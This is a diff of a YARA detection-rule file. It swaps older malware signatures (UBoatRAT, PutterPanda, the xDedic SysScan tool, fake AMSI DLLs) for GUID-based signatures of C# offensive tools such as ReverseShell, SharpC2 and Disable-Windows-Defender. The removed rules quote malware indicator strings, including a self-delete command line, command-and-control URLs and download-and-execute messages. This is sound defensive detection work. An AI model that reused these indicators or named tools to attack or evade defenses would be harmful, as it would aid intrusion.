-		hash3 = "42d8a84cd49ff3afacf3d549fbab1fa80d5eda0c8625938b6d32e18004b0edac"
-		hash4 = "6bea49e4260f083ed6b73e100550ecd22300806071f4a6326e0544272a84526c"
-		hash5 = "cf832f32b8d27cf9911031910621c21bd3c20e71cc062716923304dacf4dadb7"
-		hash6 = "bf7c6e911f14a1f8679c9b0c2b183d74d5accd559e17297adcd173d76755e271"
 
 	strings:
-		$s1 = "URLDownloadToFileA" ascii
-		$s2 = "GetModuleFileNameW" ascii
-		$s4 = "WININET.dll" ascii
-		$s5 = "urlmon.dll" ascii
-		$s6 = "WTSAPI32.dll" ascii
-		$s7 = "IPHLPAPI.DLL" ascii
-		$op1 = { 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
-               69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
-               74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
-               6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 }
-		$vprotect = { 2E 76 6D 70 30 }
+		$typelibguid0lo = "8586f5b1-2ef4-4f35-bd45-c6206fdc0ebc" ascii wide
+		$typelibguid1lo = "fe184ab5-f153-4179-9bf5-50523987cf1f" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3c ) ) == 0x4550 and filesize < 1400KB and filesize > 800KB and ( all of ( $s* ) and $op1 at 64 and uint16( uint32( 0x3c ) + 11 ) == 0x59 and $vprotect in ( 600 .. 700 ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Uboatrat_Dropper : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Toxiceye : FILE
 {
 	meta:
-		description = "Detects UBoatRAT Dropper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f3d4e333-1282-5f6e-9294-628a8230d2a5"
-		date = "2017-11-29"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_uboat_rat.yar#L52-L69"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0b7b62ce-9c24-5d81-8d87-22f6e461a62b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/LimerBoy/ToxicEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L385-L398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f8dcc8559fa0ab1644ef6bab9bc875f3d62391c157b373e0355ad03d35e5601"
+		logic_hash = "58070408e4c08d20a3f37a2bf59f4b125ef4608e9ee3e7ed5fe1e26ad51b6c88"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f4c659238ffab95e87894d2c556f887774dce2431e8cb87f881df4e4d26253a3"
 
 	strings:
-		$s1 = "GetCurrenvackageId" fullword ascii
-		$s2 = "fghijklmnopq" fullword ascii
-		$s3 = "23456789:;<=>?@ABCDEFGHIJKLMNOPQ" fullword ascii
-		$s4 = "PMM/dd/y" fullword ascii
-		$s5 = "bad all" fullword ascii
+		$typelibguid0lo = "1bcfe538-14f4-4beb-9a3f-3f9472794902" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_CMD_Script_Obfuscated_Feb19_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Disable_Windows_Defender : FILE
 {
 	meta:
-		description = "Detects obfuscated batch script using env variable sub-strings"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8cc99ff5-968c-5b12-9aac-72279c1b8a6b"
-		date = "2019-03-01"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DbgShell/status/1101076457189793793"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cmd_script_obfuscated.yar#L2-L18"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9a673427-e66e-594b-942a-64a2272319f3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Disable-Windows-Defender"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L400-L413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71c8831686796c921674ec293b5bdf2c42ae9069b258c85c9e0ca6a7f972daf8"
+		logic_hash = "65cc86433a3c4cb22ad54065b90010a0f3eb18ad8791c45343d103deea880195"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "deed88c554c8f9bef4078e9f0c85323c645a52052671b94de039b438a8cff382"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$h1 = { 40 65 63 68 6F 20 6F 66 66 0D 0A 73 65 74 20 }
-		$s1 = { 2C 31 25 0D 0A 65 63 68 6F 20 25 25 }
+		$typelibguid0lo = "501e3fdc-575d-492e-90bc-703fb6280ee2" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x6540 and filesize < 200KB and $h1 at 0 and uint16( filesize -3 ) == 0x0d25 and uint8( filesize -1 ) == 0x0a and $s1 in ( filesize -200 .. filesize )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Microsoft_7Z_SFX_Combo : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke_Poc : FILE
 {
 	meta:
-		description = "Detects a suspicious file that has a Microsoft copyright and is a 7z SFX"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9163a689-c3ee-59b1-bf58-aef5d3072be6"
-		date = "2018-09-16"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sfx_with_microsoft_copyright.yar#L1-L24"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/dtrizna/DInvoke_PoC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L415-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f48887e0c1031d180e25f2d1b9e016d434f594aef283ab3af8418e86496d2eac"
-		score = 65
+		logic_hash = "51299abecf7244d150e7c148b5896cd64bcf5817a9a962013d6a986891bd321f"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "7ZSfx%03x.cmd" fullword wide
-		$s2 = "7z SFX: error" fullword ascii
-		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
-              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
-              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
-              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
-              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
-              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
-              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
-              00 76 00 65 00 64 00 2E }
+		$typelibguid0lo = "5a869ab2-291a-49e6-a1b7-0d0f051bef0e" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Microsoft_RAR_SFX_Combo : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Reverseshell : FILE
 {
 	meta:
-		description = "Detects a suspicious file that has a Microsoft copyright and is a RAR SFX"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0fa81a9e-2f41-5783-9786-bb6d33b82bd9"
-		date = "2018-09-16"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sfx_with_microsoft_copyright.yar#L27-L50"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "876932d5-a65d-5230-9cb8-24038ad8af0d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/chango77747/ReverseShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L430-L444"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0f29fcf86139a6f95b4ab0095154bd26b555f1576b5a2e263c1939bc30e3431"
-		score = 65
+		logic_hash = "cf8220444b6ffe810451e4754f8561e80acd99f8b5fbb013e8eef488b3c4243e"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "winrarsfxmappingfile.tmp" fullword wide
-		$s2 = "WinRAR self-extracting archive" fullword wide
-		$s3 = "WINRAR.SFX" fullword
-		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
-              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
-              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
-              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
-              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
-              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
-              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
-              00 76 00 65 00 64 00 2E }
+		$typelibguid0lo = "980109e4-c988-47f9-b2b3-88d63fababdc" ascii wide
+		$typelibguid1lo = "8abe8da1-457e-4933-a40d-0958c8925985" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_SUSP_Fake_AMSI_DLL_Jun23_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpc2 : FILE
 {
 	meta:
-		description = "Detects an amsi.dll that has the same exports as the legitimate one but very different contents or file sizes"
-		author = "Florian Roth"
-		id = "b12df9de-ecfb-562b-b599-87fa786a33bc"
-		date = "2023-06-07"
-		modified = "2023-06-12"
-		reference = "https://twitter.com/eversinc33/status/1666121784192581633?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_fake_amsi_dll.yar#L3-L35"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2ed6d74e-2b95-5c70-807a-4da5e62f5853"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/SharpC2/SharpC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L446-L464"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec3db233ab22144bc65614b45bb894a7ea5a4fd40ccb603e6e52cc1b9ff8805b"
-		score = 65
+		logic_hash = "5439cbe057d5735e3d35ac01966fc65ca0727e1c1c353564d38d1c20bb04484a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Microsoft.Antimalware.Scan.Interface" ascii
-		$a2 = "Amsi.pdb" ascii fullword
-		$a3 = "api-ms-win-core-sysinfo-" ascii
-		$a4 = "Software\\Microsoft\\AMSI\\Providers" wide
-		$a5 = "AmsiAntimalware@" ascii
-		$a6 = "AMSI UAC Scan" ascii
-		$fp1 = "Wine builtin DLL"
+		$typelibguid0lo = "62b9ee4f-1436-4098-9bc1-dd61b42d8b81" ascii wide
+		$typelibguid1lo = "d2f17a91-eb2d-4373-90bf-a26e46c68f76" ascii wide
+		$typelibguid2lo = "a9db9fcc-7502-42cd-81ec-3cd66f511346" ascii wide
+		$typelibguid3lo = "ca6cc2ee-75fd-4f00-b687-917fa55a4fae" ascii wide
+		$typelibguid4lo = "a1167b68-446b-4c0c-a8b8-2a7278b67511" ascii wide
+		$typelibguid5lo = "4d8c2a88-1da5-4abe-8995-6606473d7cf1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "AmsiInitialize" ) and pe.exports ( "AmsiScanString" ) ) and ( filesize > 200KB or filesize < 35KB or not 4 of ( $a* ) ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Xdedic_Sysscan_Unpacked : CRIMEWARE FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyexec : FILE
 {
 	meta:
-		description = "Detects SysScan APT tool"
-		author = " Kaspersky Lab"
-		id = "4f5d37b3-e3aa-51ec-b36e-b494c8abe227"
-		date = "2016-03-14"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/75027/xdedic-the-shady-world-of-hacked-servers-for-sale/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sysscan.yar#L1-L27"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "853b630d-77ba-5847-a129-c9fa0538f81b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/HackingThings/SneakyExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L466-L479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "df0834e89c512721547001c910c1461f028a46e954dd51017d4e8bde7893d04a"
+		logic_hash = "cb2d505666c4395c9e43607468332c7559807d4da063eb69b31638f2520fee0e"
 		score = 75
 		quality = 85
-		tags = "CRIMEWARE, FILE"
-		maltype = "crimeware"
-		type = "crimeware"
-		filetype = "Win32 EXE"
-		version = "1.0"
-		hash1 = "fac495be1c71012682ebb27092060b43"
-		hash2 = "e8cc69231e209db7968397e8a244d104"
-		hash3 = "a53847a51561a7e76fd034043b9aa36d"
-		hash4 = "e8691fa5872c528cd8e72b82e7880e98"
-		hash5 = "F661b50d45400e7052a2427919e2f777"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide
-		$a2 = "SysScan DEBUG Mode!!!" ascii wide
-		$a3 = "This rechecking? (set 0/1 or press enter key)" ascii wide
-		$a4 = "http://37.49.224.144:8189/manual_result" ascii wide
-		$b1 = "Checker end work!" ascii wide
-		$b2 = "Trying send result..." ascii wide
+		$typelibguid0lo = "612590aa-af68-41e6-8ce2-e831f7fe4ccc" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( any of ( $a* ) or all of ( $b* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Xdedic_Packed_Syscan : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Urbanbishoplocal : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Kaspersky Lab - modified by Florian Roth"
-		id = "da8e59f3-53f9-504b-afff-9caab798db6c"
-		date = "2016-07-02"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sysscan.yar#L29-L39"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "53b690ec-7d20-5e46-b368-b458ce56073d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/slyd0g/UrbanBishopLocal"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L481-L494"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "04eb5b056e892b2c2cf87e3770847226cccaceb1c743f3b9f8ac548026747ccf"
+		logic_hash = "cd0ded2fbfbf0fb8c53928e3f1bc4425bfa6112b92b609f421d517f931814faa"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		company = "Kaspersky Lab"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "SysScan.exe" nocase ascii wide
-		$a2 = "1.3.4." wide
+		$typelibguid0lo = "88b8515e-a0e8-4208-a9a0-34b01d7ba533" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 500KB and filesize < 1500KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshell : FILE
 {
 	meta:
-		description = "Detects an APT malware related to PutterPanda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "980922cb-edfb-50ab-a102-a8168aa2b0e0"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L1-L27"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5966be44-c010-5c63-9576-1aaf36397d6c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/cobbr/SharpShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L496-L510"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5367e183df155e3133d916f7080ef973f7741d34"
-		logic_hash = "f2ffab73993c578f47e17babc2e65301b3720e438b33e57f2af31b7183bfd20f"
-		score = 70
+		logic_hash = "9d49e6a85514fb47bd6875372cbbc8fc1d30e8572ce6e5caa594da07f58d4c06"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "app.stream-media.net" fullword ascii
-		$x1 = "File %s does'nt exist or is forbidden to acess!" fullword ascii
-		$s6 = "GetProcessAddresss of pHttpQueryInfoA Failed!" fullword ascii
-		$s7 = "Connect %s error!" fullword ascii
-		$s9 = "Download file %s successfully!" fullword ascii
-		$s10 = "index.tmp" fullword ascii
-		$s11 = "Execute PE Successfully" fullword ascii
-		$s13 = "aa/22/success.xml" fullword ascii
-		$s16 = "aa/22/index.asp" fullword ascii
-		$s18 = "File %s a Non-Pe File" fullword ascii
-		$s19 = "SendRequset error!" fullword ascii
-		$s20 = "filelist[%d]=%s" fullword ascii
+		$typelibguid0lo = "bdba47c5-e823-4404-91d0-7f6561279525" ascii wide
+		$typelibguid1lo = "b84548dc-d926-4b39-8293-fa0bdef34d49" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( 4 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Rel_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Evilwmiprovider : FILE
 {
 	meta:
-		description = "APT Malware related to PutterPanda Group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3eef8869-45d6-57a4-a182-c5349b034cf4"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L30-L59"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3a6cf00e-28c4-5e6f-a28d-b3f28fca6eed"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/sunnyc7/EvilWMIProvider"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L512-L525"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f97e01ee04970d1fc4d988a9e9f0f223ef2a6381"
-		logic_hash = "60a48288cb106135728fb676ecad2b9be5254d5dc5094da158ea9dc07704c9ab"
-		score = 70
+		logic_hash = "431aa788d1cd192803ad7a5cc66ea48b7a83d47e009c42280e3e77c6ffb8662c"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?" fullword ascii
-		$s1 = "http://update.konamidata.com/test/zl/sophos/td/index.dat?" fullword ascii
-		$s2 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
-		$s3 = "Internet connect error:%d" fullword ascii
-		$s4 = "Proxy-Authorization:Basic" fullword ascii
-		$s5 = "HttpQueryInfo failed:%d" fullword ascii
-		$s6 = "read file error:%d" fullword ascii
-		$s7 = "downdll.dll" fullword ascii
-		$s8 = "rz.dat" fullword ascii
-		$s9 = "Invalid url" fullword ascii
-		$s10 = "Create file failed" fullword ascii
-		$s11 = "myAgent" fullword ascii
-		$s12 = "%s%s%d%d" fullword ascii
-		$s13 = "down file success" fullword ascii
-		$s15 = "error!" fullword ascii
-		$s18 = "Avaliable data:%u bytes" fullword ascii
+		$typelibguid0lo = "a4020626-f1ec-4012-8b17-a2c8a0204a4b" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_PSAPI : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gadgettojscript : FILE
 {
 	meta:
-		description = "Detects a malware related to Putter Panda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e074ab8a-2ca4-579e-aaef-cdfb9c64b21b"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L61-L79"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e296795f-d006-52a9-92c4-fb60c930564b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/med0x2e/GadgetToJScript"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L527-L541"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f93a7945a33145bb6c106a51f08d8f44eab1cdf5"
-		logic_hash = "b73f1db2ca8a3164562314ebd9903c864eb2690c95731959df0e99656544ed40"
-		score = 70
+		logic_hash = "b072024bc927eaff8bb81bc660dd55a126f9b78e5db591042137b59647631544"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "LOADER ERROR" fullword ascii
-		$s1 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s2 = "psapi.dll" fullword ascii
-		$s3 = "urlmon.dll" fullword ascii
-		$s4 = "WinHttpGetProxyForUrl" fullword ascii
+		$typelibguid0lo = "af9c62a1-f8d2-4be0-b019-0a7873e81ea9" ascii wide
+		$typelibguid1lo = "b2b3adb0-1669-4b94-86cb-6dd682ddbea3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_WUAUCLT
+rule SIGNATURE_BASE_HKTL_NET_GUID_Azurecli_Extractor : FILE
 {
 	meta:
-		description = "Detects a malware related to Putter Panda"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5c8e0629-b5f2-5933-8c74-c49b756aaf18"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L81-L108"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f595545a-a7a6-577c-b3f4-febf7bf1b6c3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/0x09AL/AzureCLI-Extractor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L543-L556"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fd5ca5a2d444865fa8320337467313e4026b9f78"
-		logic_hash = "49cae3b727d6b2673dc9a6497d59c9abdd78d486e1eaf6f036f6eb1aef9a8fcb"
-		score = 70
+		logic_hash = "6c55a291ba3475a7c7faa2a0152c04b01066a3b3569a5fb052c092b08a8e75ae"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x0 = "WUAUCLT.EXE" fullword wide
-		$x1 = "%s\\tmp%d.exe" fullword ascii
-		$x2 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s1 = "Microsoft Windows Operating System" fullword wide
-		$s2 = "InternetQueryOptionA" fullword ascii
-		$s3 = "LookupPrivilegeValueA" fullword ascii
-		$s4 = "WNetEnumResourceA" fullword ascii
-		$s5 = "HttpSendRequestExA" fullword ascii
-		$s6 = "PSAPI.DLL" fullword ascii
-		$s7 = "Microsoft(R) Windows(R) Operating System" fullword wide
-		$s8 = "CreatePipe" fullword ascii
-		$s9 = "EnumProcessModules" fullword ascii
+		$typelibguid0lo = "a73cad74-f8d6-43e6-9a4c-b87832cdeace" ascii wide
 
 	condition:
-		all of ( $x* ) or ( 1 of ( $x* ) and all of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Escaper : FILE
 {
 	meta:
-		description = "Detects a malware "
-		author = "YarGen Rule Generator"
-		id = "5e7910e7-3f33-50fb-a87f-bf0bbf8a2797"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "not set"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L110-L131"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ea95ff3c-0cbb-5230-b5e4-bd8b2ff975eb"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/UAC-Escaper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L558-L571"
